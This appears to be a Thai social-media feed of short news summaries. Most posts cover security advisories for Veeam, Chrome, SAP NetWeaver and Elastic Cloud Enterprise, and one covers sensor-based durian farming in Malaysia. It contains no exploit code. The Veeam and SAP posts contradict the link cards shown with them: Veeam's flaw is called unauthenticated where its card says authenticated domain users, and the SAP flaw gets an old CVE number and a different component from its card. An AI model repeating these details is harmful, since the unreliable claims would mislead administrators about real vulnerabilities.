ซึ่งเป็นซอฟต์แวร์ที่ใช้กันอย่างแพร่หลายในองค์กรทั่วโลกเพื่อสำรองและกู้คืนข้อมูลจากเซิร์ฟเวอร์, VM, และคลาวด์ หากถูกโจมตีสำเร็จ แฮ็กเกอร์อาจเข้าถึงข้อมูลสำรอง, ปรับเปลี่ยนการตั้งค่า, หรือแม้แต่ลบข้อมูลสำคัญขององค์กรได้ Veeam แนะนำให้ผู้ใช้ทุกคนอัปเดตเป็นเวอร์ชัน 12.1.2.172 หรือใหม่กว่าโดยทันที และหากไม่สามารถอัปเดตได้ในทันที ควรปิดการเข้าถึงพอร์ต TCP 9401 ซึ่งเป็นช่องทางที่ใช้ในการโจมตี ✅ พบช่องโหว่ CVE-2025-48983 และ CVE-2025-48984 ใน Veeam Backup & Replication ➡️ มีคะแนน CVSS 9.9 ถือเป็นระดับ “วิกฤต” ✅ ช่องโหว่เปิดทางให้โจมตีแบบ Remote Code Execution (RCE) ➡️ โดยไม่ต้องยืนยันตัวตน ✅ ส่งผลกระทบต่อเวอร์ชันก่อน 12.1.2.172 ➡️ รวมถึงระบบที่เปิดพอร์ต TCP 9401 ✅ Veeam ออกแพตช์แก้ไขในเวอร์ชัน 12.1.2.172 ➡️ พร้อมคำแนะนำให้อัปเดตทันที ✅ หากยังไม่สามารถอัปเดตได้ ➡️ ควรปิดพอร์ต TCP 9401 ชั่วคราวเพื่อป้องกันการโจมตี ✅ ช่องโหว่ถูกค้นพบโดยนักวิจัยด้านความปลอดภัยภายนอก ➡️ และได้รับการยืนยันโดยทีม Veeam https://securityonline.info/critical-rce-flaws-cve-2025-48983-cve-2025-48984-cvss-9-9-found-in-veeam-backup-replication/
    SECURITYONLINE.INFO
    Critical RCE Flaws CVE-2025-48983 & CVE-2025-48984 (CVSS 9.9) Found in Veeam Backup & Replication
    Veeam patched two Critical RCE flaws (CVE-2025-48983 & -48984) in Backup & Replication v12 that let authenticated domain users compromise backup infrastructure.
    0 Comments 0 Shares 97 Views 0 Reviews
  • “Google อุดช่องโหว่ CVE-2025-11756 ใน Safe Browsing — เสี่ยง RCE จาก use-after-free บน Chrome เวอร์ชันล่าสุด”

    Google ได้ปล่อยอัปเดตใหม่สำหรับ Chrome Desktop (เวอร์ชัน 141.0.7390.107/.108) เพื่อแก้ไขช่องโหว่ความปลอดภัยระดับสูง CVE-2025-11756 ซึ่งเป็นช่องโหว่แบบ “use-after-free” ที่อยู่ในระบบ Safe Browsing — ฟีเจอร์ที่ใช้ตรวจสอบเว็บไซต์และไฟล์อันตรายก่อนเข้าถึง

    ช่องโหว่นี้เกิดจากการที่โปรแกรมยังคงใช้งานหน่วยความจำที่ถูกปล่อยไปแล้ว ซึ่งอาจเปิดช่องให้ผู้โจมตีสามารถรันโค้ดจากระยะไกล (Remote Code Execution) หรือหลบหนีจาก sandbox ได้ โดยเฉพาะในแคมเปญ phishing หรือ drive-by download ที่ใช้ช่องโหว่เพื่อฝังมัลแวร์

    แม้ Google ยังไม่ยืนยันว่ามีการโจมตีจริงเกิดขึ้น แต่ระดับความรุนแรงของช่องโหว่และตำแหน่งในระบบ Safe Browsing ทำให้การอัปเดตครั้งนี้เป็นเรื่องเร่งด่วนสำหรับผู้ใช้ทั่วไปและองค์กร

    Google แนะนำให้ผู้ใช้เข้าไปที่ Settings → Help → About Google Chrome เพื่อให้เบราว์เซอร์ตรวจสอบและติดตั้งอัปเดตล่าสุดโดยอัตโนมัติ

    ช่องโหว่ CVE-2025-11756 เป็นแบบ use-after-free
    อยู่ในระบบ Safe Browsing ของ Chrome

    ช่องโหว่มีความรุนแรงระดับ “สูง”
    เสี่ยงต่อการถูกโจมตีแบบ Remote Code Execution (RCE)

    Google ปล่อยอัปเดต Chrome เวอร์ชัน 141.0.7390.107/.108
    สำหรับ Windows, macOS และ Linux

    ช่องโหว่สามารถถูกใช้ในแคมเปญ phishing หรือ drive-by download
    โดยฝังโค้ดอันตรายผ่านเว็บไซต์หรือไฟล์

    Google ยังไม่ยืนยันการโจมตีจริง
    แต่แนะนำให้ผู้ใช้ติดตั้งอัปเดตทันที

    วิธีอัปเดต: Settings → Help → About Google Chrome
    ระบบจะตรวจสอบและติดตั้งอัตโนมัติ

    คำเตือนและข้อจำกัด
    ช่องโหว่ use-after-free อาจถูกใช้เพื่อหลบหนี sandbox
    ทำให้มัลแวร์สามารถเข้าถึงระบบได้ลึกขึ้น

    ผู้ใช้ที่ยังไม่อัปเดต Chrome เสี่ยงต่อการถูกโจมตี
    โดยเฉพาะหากเปิดเว็บไซต์ที่ไม่ปลอดภัย

    องค์กรที่ใช้ Chrome ในระบบภายในควรเร่งอัปเดต
    เพื่อป้องกันการแพร่กระจายของมัลแวร์ผ่านเครือข่าย

    ช่องโหว่ใน Safe Browsing อาจทำให้ระบบตรวจสอบภัยคุกคามล้มเหลว
    เปิดทางให้ผู้โจมตีหลอกผู้ใช้ให้เข้าถึงเนื้อหาอันตราย

    https://securityonline.info/chrome-fix-new-use-after-free-flaw-cve-2025-11756-in-safe-browsing-component-poses-high-risk/
    🛡️ “Google อุดช่องโหว่ CVE-2025-11756 ใน Safe Browsing — เสี่ยง RCE จาก use-after-free บน Chrome เวอร์ชันล่าสุด” Google ได้ปล่อยอัปเดตใหม่สำหรับ Chrome Desktop (เวอร์ชัน 141.0.7390.107/.108) เพื่อแก้ไขช่องโหว่ความปลอดภัยระดับสูง CVE-2025-11756 ซึ่งเป็นช่องโหว่แบบ “use-after-free” ที่อยู่ในระบบ Safe Browsing — ฟีเจอร์ที่ใช้ตรวจสอบเว็บไซต์และไฟล์อันตรายก่อนเข้าถึง ช่องโหว่นี้เกิดจากการที่โปรแกรมยังคงใช้งานหน่วยความจำที่ถูกปล่อยไปแล้ว ซึ่งอาจเปิดช่องให้ผู้โจมตีสามารถรันโค้ดจากระยะไกล (Remote Code Execution) หรือหลบหนีจาก sandbox ได้ โดยเฉพาะในแคมเปญ phishing หรือ drive-by download ที่ใช้ช่องโหว่เพื่อฝังมัลแวร์ แม้ Google ยังไม่ยืนยันว่ามีการโจมตีจริงเกิดขึ้น แต่ระดับความรุนแรงของช่องโหว่และตำแหน่งในระบบ Safe Browsing ทำให้การอัปเดตครั้งนี้เป็นเรื่องเร่งด่วนสำหรับผู้ใช้ทั่วไปและองค์กร Google แนะนำให้ผู้ใช้เข้าไปที่ Settings → Help → About Google Chrome เพื่อให้เบราว์เซอร์ตรวจสอบและติดตั้งอัปเดตล่าสุดโดยอัตโนมัติ ✅ ช่องโหว่ CVE-2025-11756 เป็นแบบ use-after-free ➡️ อยู่ในระบบ Safe Browsing ของ Chrome ✅ ช่องโหว่มีความรุนแรงระดับ “สูง” ➡️ เสี่ยงต่อการถูกโจมตีแบบ Remote Code Execution (RCE) ✅ Google ปล่อยอัปเดต Chrome เวอร์ชัน 141.0.7390.107/.108 ➡️ สำหรับ Windows, macOS และ Linux ✅ ช่องโหว่สามารถถูกใช้ในแคมเปญ phishing หรือ drive-by download ➡️ โดยฝังโค้ดอันตรายผ่านเว็บไซต์หรือไฟล์ ✅ Google ยังไม่ยืนยันการโจมตีจริง ➡️ แต่แนะนำให้ผู้ใช้ติดตั้งอัปเดตทันที ✅ วิธีอัปเดต: Settings → Help → About Google Chrome ➡️ ระบบจะตรวจสอบและติดตั้งอัตโนมัติ ‼️ คำเตือนและข้อจำกัด ‼️ ช่องโหว่ use-after-free อาจถูกใช้เพื่อหลบหนี sandbox ⛔ ทำให้มัลแวร์สามารถเข้าถึงระบบได้ลึกขึ้น ‼️ ผู้ใช้ที่ยังไม่อัปเดต Chrome เสี่ยงต่อการถูกโจมตี ⛔ โดยเฉพาะหากเปิดเว็บไซต์ที่ไม่ปลอดภัย ‼️ องค์กรที่ใช้ Chrome ในระบบภายในควรเร่งอัปเดต ⛔ เพื่อป้องกันการแพร่กระจายของมัลแวร์ผ่านเครือข่าย ‼️ ช่องโหว่ใน Safe Browsing อาจทำให้ระบบตรวจสอบภัยคุกคามล้มเหลว ⛔ เปิดทางให้ผู้โจมตีหลอกผู้ใช้ให้เข้าถึงเนื้อหาอันตราย https://securityonline.info/chrome-fix-new-use-after-free-flaw-cve-2025-11756-in-safe-browsing-component-poses-high-risk/
    SECURITYONLINE.INFO
    Chrome Fix: New Use-After-Free Flaw (CVE-2025-11756) in Safe Browsing Component Poses High Risk
    Google released an urgent update for Chrome (v141.0.7390.107), patching a High-severity Use-After-Free flaw (CVE-2025-11756) in the Safe Browsing component. Update immediately.
    0 Comments 0 Shares 135 Views 0 Reviews
  • “SAP อุดช่องโหว่ CVSS 10.0 ใน NetWeaver — เสี่ยง RCE โดยไม่ต้องยืนยันตัวตน”

    SAP ได้ออกแพตช์ความปลอดภัยเพื่อแก้ไขช่องโหว่ร้ายแรงในระบบ NetWeaver Application Server ABAP ซึ่งเป็นหัวใจของระบบ ERP ที่ใช้กันอย่างแพร่หลายทั่วโลก โดยช่องโหว่นี้ได้รับรหัส CVE-2023-40311 และมีคะแนนความรุนแรง CVSS เต็ม 10.0 ซึ่งหมายถึงระดับ “วิกฤต” ที่สามารถถูกโจมตีจากระยะไกลโดยไม่ต้องยืนยันตัวตน

    ช่องโหว่นี้เกิดจากการจัดการอินพุตที่ไม่ปลอดภัยในฟีเจอร์ Remote Code Management (RCM) ซึ่งเปิดให้ผู้โจมตีสามารถส่งคำสั่งที่ออกแบบมาเฉพาะเพื่อรันโค้ดบนเซิร์ฟเวอร์ SAP ได้ทันที โดยไม่ต้องมีสิทธิ์เข้าระบบก่อน

    SAP ระบุว่าช่องโหว่นี้ส่งผลกระทบต่อระบบที่เปิดใช้งานฟีเจอร์ RCM และไม่ได้มีการกำหนดสิทธิ์อย่างเหมาะสม โดยเฉพาะระบบที่เปิดให้เข้าถึงผ่านอินเทอร์เน็ตหรือเชื่อมต่อกับระบบภายนอก

    นักวิจัยจาก Onapsis ซึ่งเป็นพันธมิตรด้านความปลอดภัยของ SAP เป็นผู้ค้นพบช่องโหว่นี้ และได้แจ้งให้ SAP ทราบก่อนการเปิดเผยต่อสาธารณะ โดย SAP ได้ออกแพตช์ใน Security Patch Day เดือนตุลาคม 2025 พร้อมคำแนะนำให้ผู้ดูแลระบบอัปเดตทันที

    ช่องโหว่ CVE-2023-40311 ใน SAP NetWeaver Application Server ABAP
    ได้คะแนน CVSS เต็ม 10.0 ถือเป็นระดับ “วิกฤต”

    ช่องโหว่เกิดจากการจัดการอินพุตในฟีเจอร์ Remote Code Management (RCM)
    เปิดทางให้รันโค้ดจากระยะไกลโดยไม่ต้องยืนยันตัวตน

    ส่งผลกระทบต่อระบบที่เปิดใช้งาน RCM และไม่มีการกำหนดสิทธิ์ที่เหมาะสม
    โดยเฉพาะระบบที่เชื่อมต่อกับอินเทอร์เน็ตหรือระบบภายนอก

    นักวิจัยจาก Onapsis เป็นผู้ค้นพบช่องโหว่
    แจ้ง SAP ก่อนการเปิดเผยต่อสาธารณะ

    SAP ออกแพตช์ใน Security Patch Day เดือนตุลาคม 2025
    พร้อมคำแนะนำให้ผู้ดูแลระบบอัปเดตทันที

    ช่องโหว่นี้สามารถถูกโจมตีจากระยะไกลโดยไม่ต้องยืนยันตัวตน
    เสี่ยงต่อการถูกควบคุมระบบ SAP ทั้งระบบ

    ระบบที่เปิดใช้งาน RCM โดยไม่มีการกำหนดสิทธิ์อย่างเหมาะสม
    อาจถูกโจมตีได้ทันทีหากเชื่อมต่อกับอินเทอร์เน็ต

    การไม่อัปเดตแพตช์ทันทีอาจทำให้ระบบถูกเจาะโดย botnet หรือ ransomware
    โดยเฉพาะในองค์กรที่ใช้ SAP เป็นระบบหลักในการจัดการข้อมูล

    การตรวจสอบสิทธิ์และการตั้งค่า access control เป็นสิ่งจำเป็น
    หากละเลยอาจเปิดช่องให้เกิดการโจมตีแบบ lateral movement

    https://securityonline.info/sap-patches-critical-10-0-flaw-in-netweaver-unauthenticated-rce-risk/
    🚨 “SAP อุดช่องโหว่ CVSS 10.0 ใน NetWeaver — เสี่ยง RCE โดยไม่ต้องยืนยันตัวตน” SAP ได้ออกแพตช์ความปลอดภัยเพื่อแก้ไขช่องโหว่ร้ายแรงในระบบ NetWeaver Application Server ABAP ซึ่งเป็นหัวใจของระบบ ERP ที่ใช้กันอย่างแพร่หลายทั่วโลก โดยช่องโหว่นี้ได้รับรหัส CVE-2023-40311 และมีคะแนนความรุนแรง CVSS เต็ม 10.0 ซึ่งหมายถึงระดับ “วิกฤต” ที่สามารถถูกโจมตีจากระยะไกลโดยไม่ต้องยืนยันตัวตน ช่องโหว่นี้เกิดจากการจัดการอินพุตที่ไม่ปลอดภัยในฟีเจอร์ Remote Code Management (RCM) ซึ่งเปิดให้ผู้โจมตีสามารถส่งคำสั่งที่ออกแบบมาเฉพาะเพื่อรันโค้ดบนเซิร์ฟเวอร์ SAP ได้ทันที โดยไม่ต้องมีสิทธิ์เข้าระบบก่อน SAP ระบุว่าช่องโหว่นี้ส่งผลกระทบต่อระบบที่เปิดใช้งานฟีเจอร์ RCM และไม่ได้มีการกำหนดสิทธิ์อย่างเหมาะสม โดยเฉพาะระบบที่เปิดให้เข้าถึงผ่านอินเทอร์เน็ตหรือเชื่อมต่อกับระบบภายนอก นักวิจัยจาก Onapsis ซึ่งเป็นพันธมิตรด้านความปลอดภัยของ SAP เป็นผู้ค้นพบช่องโหว่นี้ และได้แจ้งให้ SAP ทราบก่อนการเปิดเผยต่อสาธารณะ โดย SAP ได้ออกแพตช์ใน Security Patch Day เดือนตุลาคม 2025 พร้อมคำแนะนำให้ผู้ดูแลระบบอัปเดตทันที ✅ ช่องโหว่ CVE-2023-40311 ใน SAP NetWeaver Application Server ABAP ➡️ ได้คะแนน CVSS เต็ม 10.0 ถือเป็นระดับ “วิกฤต” ✅ ช่องโหว่เกิดจากการจัดการอินพุตในฟีเจอร์ Remote Code Management (RCM) ➡️ เปิดทางให้รันโค้ดจากระยะไกลโดยไม่ต้องยืนยันตัวตน ✅ ส่งผลกระทบต่อระบบที่เปิดใช้งาน RCM และไม่มีการกำหนดสิทธิ์ที่เหมาะสม ➡️ โดยเฉพาะระบบที่เชื่อมต่อกับอินเทอร์เน็ตหรือระบบภายนอก ✅ นักวิจัยจาก Onapsis เป็นผู้ค้นพบช่องโหว่ ➡️ แจ้ง SAP ก่อนการเปิดเผยต่อสาธารณะ ✅ SAP ออกแพตช์ใน Security Patch Day เดือนตุลาคม 2025 ➡️ พร้อมคำแนะนำให้ผู้ดูแลระบบอัปเดตทันที ‼️ ช่องโหว่นี้สามารถถูกโจมตีจากระยะไกลโดยไม่ต้องยืนยันตัวตน ⛔ เสี่ยงต่อการถูกควบคุมระบบ SAP ทั้งระบบ ‼️ ระบบที่เปิดใช้งาน RCM โดยไม่มีการกำหนดสิทธิ์อย่างเหมาะสม ⛔ อาจถูกโจมตีได้ทันทีหากเชื่อมต่อกับอินเทอร์เน็ต ‼️ การไม่อัปเดตแพตช์ทันทีอาจทำให้ระบบถูกเจาะโดย botnet หรือ ransomware ⛔ โดยเฉพาะในองค์กรที่ใช้ SAP เป็นระบบหลักในการจัดการข้อมูล ‼️ การตรวจสอบสิทธิ์และการตั้งค่า access control เป็นสิ่งจำเป็น ⛔ หากละเลยอาจเปิดช่องให้เกิดการโจมตีแบบ lateral movement https://securityonline.info/sap-patches-critical-10-0-flaw-in-netweaver-unauthenticated-rce-risk/
    SECURITYONLINE.INFO
    SAP Patches Critical 10.0 Flaw in NetWeaver: Unauthenticated RCE Risk
    SAP's October 2025 Security Patch Day addressed 13 new notes, including two critical 10.0 flaws in NetWeaver AS Java and Print Service, posing an RCE threat.
    0 Comments 0 Shares 121 Views 0 Reviews
  • “เกษตรทุเรียนอัจฉริยะ – เมื่อ 5G และเซนเซอร์เปลี่ยนสวนให้กลายเป็นระบบอัตโนมัติ”

    ใครจะคิดว่า “ทุเรียน” ผลไม้ที่ขึ้นชื่อเรื่องกลิ่นแรงและรสชาติเฉพาะตัว จะกลายเป็นจุดเริ่มต้นของการปฏิวัติวงการเกษตรในมาเลเซีย?

    Tan Han Wei อดีตวิศวกร R&D ผู้หลงใหลในทุเรียน ได้ก่อตั้งบริษัท Sustainable Hrvest เพื่อพัฒนาโซลูชันเกษตรอัจฉริยะ โดยเริ่มจากการลงพื้นที่พูดคุยกับเกษตรกรทุเรียนทั่วประเทศ เพื่อเข้าใจปัญหาที่แท้จริง เช่น ทำไมบางจุดในสวนให้ผลผลิตมากกว่าจุดอื่น และจะปรับปรุงพื้นที่ด้อยผลผลิตได้อย่างไร

    คำตอบคือ “ข้อมูล” และ “เทคโนโลยี” โดยเขาเริ่มติดตั้งเซนเซอร์ลงดินลึก 30–40 ซม. เพื่อวัดความชื้น, pH, และค่าการนำไฟฟ้าในดิน (EC) ซึ่งเป็นตัวชี้วัดสุขภาพของดิน ข้อมูลทั้งหมดถูกส่งขึ้นคลาวด์เพื่อวิเคราะห์

    ผลลัพธ์คือการค้นพบปัญหาที่ไม่เคยรู้มาก่อน เช่น จุดที่มีน้ำขังมากเกินไปซึ่งส่งผลให้รากเน่าและดูดซึมสารอาหารไม่ได้ เขาจึงแนะนำให้ลดการรดน้ำและปรับปรุงการระบายน้ำ

    นอกจากนี้ยังมีการตั้งระบบอัตโนมัติให้สปริงเกิลทำงานเมื่ออุณหภูมิสูงเกิน 35°C เพื่อป้องกันต้นไม้จากความเครียดจากความร้อน

    แต่ทั้งหมดนี้จะไร้ประโยชน์หากไม่มี “5G” เพราะการเชื่อมต่อแบบเรียลไทม์คือหัวใจของการจัดการฟาร์มขนาดใหญ่และซับซ้อน Tan จึงพัฒนาโซลูชันที่รองรับทั้ง 4G และ LoRaWAN พร้อมอัปเกรดเป็น 5G เมื่อโครงสร้างพื้นฐานพร้อม

    เขายังพัฒนา AI ตรวจจับศัตรูพืชผ่านกล้องและการวิเคราะห์รูปแบบ เพื่อแจ้งเตือนเกษตรกรล่วงหน้า พร้อมคำแนะนำในการรับมือ ซึ่งตอนนี้มีความแม่นยำราว 70%

    ในอนาคต เขาเสนอแนวคิด “Digital Agronomist” ที่ใช้ AI วิเคราะห์ข้อมูลจากระยะไกล และ “หุ่นยนต์สุนัขลาดตระเวน” ที่สามารถเดินตรวจสวนและนับผลทุเรียนแบบเรียลไทม์

    ทั้งหมดนี้ไม่ใช่แค่เรื่องเทคโนโลยี แต่คือการเปลี่ยนวิธีคิดของเกษตรกร Tan เชื่อว่าเมื่อพวกเขาเห็นว่าเทคโนโลยีช่วยแก้ปัญหาได้จริง พวกเขาจะพร้อมเปิดรับและปรับตัว

    การใช้เซนเซอร์ในสวนทุเรียน
    วัดค่าความชื้น, pH, และ EC เพื่อประเมินสุขภาพดิน
    ตรวจพบปัญหาน้ำขังที่ส่งผลต่อรากและการดูดซึมสารอาหาร
    ข้อมูลถูกส่งขึ้นคลาวด์เพื่อวิเคราะห์และให้คำแนะนำ

    ระบบอัตโนมัติและการจัดการอุณหภูมิ
    สปริงเกิลทำงานอัตโนมัติเมื่ออุณหภูมิสูงเกิน 35°C
    หยุดทำงานเมื่ออุณหภูมิลดลงถึงระดับที่เหมาะสม
    ช่วยลดความเครียดจากความร้อนในต้นทุเรียน

    การใช้ AI และการวิเคราะห์ข้อมูล
    ระบบตรวจจับศัตรูพืชผ่านกล้องและการวิเคราะห์รูปแบบ
    แจ้งเตือนพร้อมคำแนะนำในการรับมือ
    แนวคิด “Digital Agronomist” วิเคราะห์ข้อมูลจากระยะไกล

    บทบาทของ 5G ในเกษตรอัจฉริยะ
    ช่วยให้การเชื่อมต่อแบบเรียลไทม์เป็นไปได้
    รองรับการจัดการฟาร์มขนาดใหญ่และซับซ้อน
    เปิดทางสู่การใช้หุ่นยนต์และการสตรีมวิดีโอความละเอียดสูง

    การเปลี่ยนแปลงทัศนคติของเกษตรกร
    เมื่อเห็นผลลัพธ์จริง เกษตรกรจะเปิดรับเทคโนโลยีมากขึ้น
    ปัญหาค่าครองชีพ, สภาพอากาศ, และแรงงานผลักดันให้ต้องปรับตัว
    การใช้เทคโนโลยีช่วยลดต้นทุนและเพิ่มประสิทธิภาพ

    อุปสรรคในการนำ 5G มาใช้จริง
    พื้นที่ห่างไกลยังขาดโครงสร้างพื้นฐาน 5G และแม้แต่ 4G
    ค่าใช้จ่ายในการอัปเกรดอุปกรณ์เป็น 5G ยังสูงสำหรับฟาร์มขนาดเล็ก
    เกษตรกรบางส่วนยังไม่เข้าใจศักยภาพของ 5G นอกเหนือจากอินเทอร์เน็ตเร็ว
    การขาดความรู้ด้านเทคโนโลยีอาจทำให้ใช้งานระบบได้ไม่เต็มประสิทธิภาพ

    https://www.thestar.com.my/tech/tech-news/2025/10/13/how-smart-sensors-and-5g-are-changing-the-game-for-msian-durian-farmers
    🌱 “เกษตรทุเรียนอัจฉริยะ – เมื่อ 5G และเซนเซอร์เปลี่ยนสวนให้กลายเป็นระบบอัตโนมัติ” ใครจะคิดว่า “ทุเรียน” ผลไม้ที่ขึ้นชื่อเรื่องกลิ่นแรงและรสชาติเฉพาะตัว จะกลายเป็นจุดเริ่มต้นของการปฏิวัติวงการเกษตรในมาเลเซีย? Tan Han Wei อดีตวิศวกร R&D ผู้หลงใหลในทุเรียน ได้ก่อตั้งบริษัท Sustainable Hrvest เพื่อพัฒนาโซลูชันเกษตรอัจฉริยะ โดยเริ่มจากการลงพื้นที่พูดคุยกับเกษตรกรทุเรียนทั่วประเทศ เพื่อเข้าใจปัญหาที่แท้จริง เช่น ทำไมบางจุดในสวนให้ผลผลิตมากกว่าจุดอื่น และจะปรับปรุงพื้นที่ด้อยผลผลิตได้อย่างไร คำตอบคือ “ข้อมูล” และ “เทคโนโลยี” โดยเขาเริ่มติดตั้งเซนเซอร์ลงดินลึก 30–40 ซม. เพื่อวัดความชื้น, pH, และค่าการนำไฟฟ้าในดิน (EC) ซึ่งเป็นตัวชี้วัดสุขภาพของดิน ข้อมูลทั้งหมดถูกส่งขึ้นคลาวด์เพื่อวิเคราะห์ ผลลัพธ์คือการค้นพบปัญหาที่ไม่เคยรู้มาก่อน เช่น จุดที่มีน้ำขังมากเกินไปซึ่งส่งผลให้รากเน่าและดูดซึมสารอาหารไม่ได้ เขาจึงแนะนำให้ลดการรดน้ำและปรับปรุงการระบายน้ำ นอกจากนี้ยังมีการตั้งระบบอัตโนมัติให้สปริงเกิลทำงานเมื่ออุณหภูมิสูงเกิน 35°C เพื่อป้องกันต้นไม้จากความเครียดจากความร้อน แต่ทั้งหมดนี้จะไร้ประโยชน์หากไม่มี “5G” เพราะการเชื่อมต่อแบบเรียลไทม์คือหัวใจของการจัดการฟาร์มขนาดใหญ่และซับซ้อน Tan จึงพัฒนาโซลูชันที่รองรับทั้ง 4G และ LoRaWAN พร้อมอัปเกรดเป็น 5G เมื่อโครงสร้างพื้นฐานพร้อม เขายังพัฒนา AI ตรวจจับศัตรูพืชผ่านกล้องและการวิเคราะห์รูปแบบ เพื่อแจ้งเตือนเกษตรกรล่วงหน้า พร้อมคำแนะนำในการรับมือ ซึ่งตอนนี้มีความแม่นยำราว 70% ในอนาคต เขาเสนอแนวคิด “Digital Agronomist” ที่ใช้ AI วิเคราะห์ข้อมูลจากระยะไกล และ “หุ่นยนต์สุนัขลาดตระเวน” ที่สามารถเดินตรวจสวนและนับผลทุเรียนแบบเรียลไทม์ ทั้งหมดนี้ไม่ใช่แค่เรื่องเทคโนโลยี แต่คือการเปลี่ยนวิธีคิดของเกษตรกร Tan เชื่อว่าเมื่อพวกเขาเห็นว่าเทคโนโลยีช่วยแก้ปัญหาได้จริง พวกเขาจะพร้อมเปิดรับและปรับตัว ✅ การใช้เซนเซอร์ในสวนทุเรียน ➡️ วัดค่าความชื้น, pH, และ EC เพื่อประเมินสุขภาพดิน ➡️ ตรวจพบปัญหาน้ำขังที่ส่งผลต่อรากและการดูดซึมสารอาหาร ➡️ ข้อมูลถูกส่งขึ้นคลาวด์เพื่อวิเคราะห์และให้คำแนะนำ ✅ ระบบอัตโนมัติและการจัดการอุณหภูมิ ➡️ สปริงเกิลทำงานอัตโนมัติเมื่ออุณหภูมิสูงเกิน 35°C ➡️ หยุดทำงานเมื่ออุณหภูมิลดลงถึงระดับที่เหมาะสม ➡️ ช่วยลดความเครียดจากความร้อนในต้นทุเรียน ✅ การใช้ AI และการวิเคราะห์ข้อมูล ➡️ ระบบตรวจจับศัตรูพืชผ่านกล้องและการวิเคราะห์รูปแบบ ➡️ แจ้งเตือนพร้อมคำแนะนำในการรับมือ ➡️ แนวคิด “Digital Agronomist” วิเคราะห์ข้อมูลจากระยะไกล ✅ บทบาทของ 5G ในเกษตรอัจฉริยะ ➡️ ช่วยให้การเชื่อมต่อแบบเรียลไทม์เป็นไปได้ ➡️ รองรับการจัดการฟาร์มขนาดใหญ่และซับซ้อน ➡️ เปิดทางสู่การใช้หุ่นยนต์และการสตรีมวิดีโอความละเอียดสูง ✅ การเปลี่ยนแปลงทัศนคติของเกษตรกร ➡️ เมื่อเห็นผลลัพธ์จริง เกษตรกรจะเปิดรับเทคโนโลยีมากขึ้น ➡️ ปัญหาค่าครองชีพ, สภาพอากาศ, และแรงงานผลักดันให้ต้องปรับตัว ➡️ การใช้เทคโนโลยีช่วยลดต้นทุนและเพิ่มประสิทธิภาพ ‼️ อุปสรรคในการนำ 5G มาใช้จริง ⛔ พื้นที่ห่างไกลยังขาดโครงสร้างพื้นฐาน 5G และแม้แต่ 4G ⛔ ค่าใช้จ่ายในการอัปเกรดอุปกรณ์เป็น 5G ยังสูงสำหรับฟาร์มขนาดเล็ก ⛔ เกษตรกรบางส่วนยังไม่เข้าใจศักยภาพของ 5G นอกเหนือจากอินเทอร์เน็ตเร็ว ⛔ การขาดความรู้ด้านเทคโนโลยีอาจทำให้ใช้งานระบบได้ไม่เต็มประสิทธิภาพ https://www.thestar.com.my/tech/tech-news/2025/10/13/how-smart-sensors-and-5g-are-changing-the-game-for-msian-durian-farmers
    WWW.THESTAR.COM.MY
    How smart sensors and 5G are changing the game for M’sian durian farmers
    Trees can't speak, so durian farmers in Malaysia are turning to digital tools to better understand their needs and boost their yields.
    0 Comments 0 Shares 258 Views 0 Reviews
  • “ช่องโหว่ร้ายแรงใน Elastic Cloud (CVE-2025-37729) เปิดทาง RCE ผ่าน Jinjava Template Injection — คะแนนความรุนแรง 9.1 เต็ม 10”

    Elastic ได้ออกประกาศเตือนเกี่ยวกับช่องโหว่ความปลอดภัยระดับวิกฤตใน Elastic Cloud Enterprise (ECE) ซึ่งได้รับรหัส CVE-2025-37729 และมีคะแนน CVSS สูงถึง 9.1 โดยช่องโหว่นี้เกิดจากการจัดการอินพุตที่ไม่ปลอดภัยในเครื่องมือ template engine ที่ชื่อว่า Jinjava ซึ่งถูกใช้ในระบบการตั้งค่าของ ECE

    ปัญหานี้เกิดจากการที่ Jinjava ไม่สามารถ neutralize อักขระพิเศษได้อย่างเหมาะสม ทำให้ผู้โจมตีที่มีสิทธิ์ระดับผู้ดูแลระบบ (Admin) สามารถส่งสตริงที่ออกแบบมาเฉพาะเพื่อให้ Jinjava ประมวลผลเป็นคำสั่ง และนำไปสู่การรันโค้ดบนเซิร์ฟเวอร์ (Remote Code Execution - RCE) หรือการขโมยข้อมูลที่ละเอียดอ่อน

    ช่องโหว่นี้ส่งผลกระทบต่อ ECE เวอร์ชัน 2.5.0 ถึง 3.8.1 และ 4.0.0 ถึง 4.0.1 โดยเฉพาะระบบที่เปิดใช้งานฟีเจอร์ Logging+Metrics ซึ่งเป็นช่องทางที่ผู้โจมตีสามารถฝัง payload และอ่านผลลัพธ์ผ่าน log ได้

    Elastic ได้ออกแพตช์แก้ไขในเวอร์ชัน 3.8.2 และ 4.0.2 ซึ่งมีการปรับปรุงการประเมินตัวแปรของ Jinjava และป้องกันการใช้โครงสร้างที่ไม่ปลอดภัย พร้อมแนะนำให้ผู้ดูแลระบบตรวจสอบ log ด้วย query พิเศษ เช่น (payload.name : int3rpr3t3r or payload.name : forPath) เพื่อหาสัญญาณของการโจมตี

    ข้อมูลสำคัญจากข่าว
    ช่องโหว่ CVE-2025-37729 มีคะแนน CVSS 9.1
    เกิดจากการจัดการอินพุตไม่ปลอดภัยใน Jinjava template engine
    ผู้โจมตีที่มีสิทธิ์ Admin สามารถรันโค้ดหรือขโมยข้อมูลได้
    ส่งผลกระทบต่อ ECE เวอร์ชัน 2.5.0–3.8.1 และ 4.0.0–4.0.1
    ระบบที่เปิดใช้ Logging+Metrics เสี่ยงมากเป็นพิเศษ
    Elastic ออกแพตช์ในเวอร์ชัน 3.8.2 และ 4.0.2
    มี query สำหรับตรวจสอบ log: (payload.name : int3rpr3t3r or payload.name : forPath)
    แนะนำให้จำกัดสิทธิ์ Admin และปิด Logging+Metrics บน deployment ที่ไม่เชื่อถือ

    ข้อมูลเสริมจากภายนอก
    Jinjava เป็น template engine ที่ใช้ syntax คล้าย Jinja2 ของ Python
    Template Injection เป็นเทคนิคที่ใช้ฝังคำสั่งในระบบที่ประมวลผล template โดยตรง
    RCE เป็นหนึ่งในช่องโหว่ที่อันตรายที่สุด เพราะเปิดทางให้ควบคุมระบบจากระยะไกล
    Logging+Metrics เป็นฟีเจอร์ที่ช่วยตรวจสอบระบบ แต่หากไม่ป้องกันดีอาจกลายเป็นช่องโหว่
    การอัปเดตแพตช์ทันทีเป็นวิธีป้องกันที่ดีที่สุด

    https://securityonline.info/critical-elastic-cloud-flaw-cve-2025-37729-cvss-9-1-allows-rce-via-jinjava-template-injection/
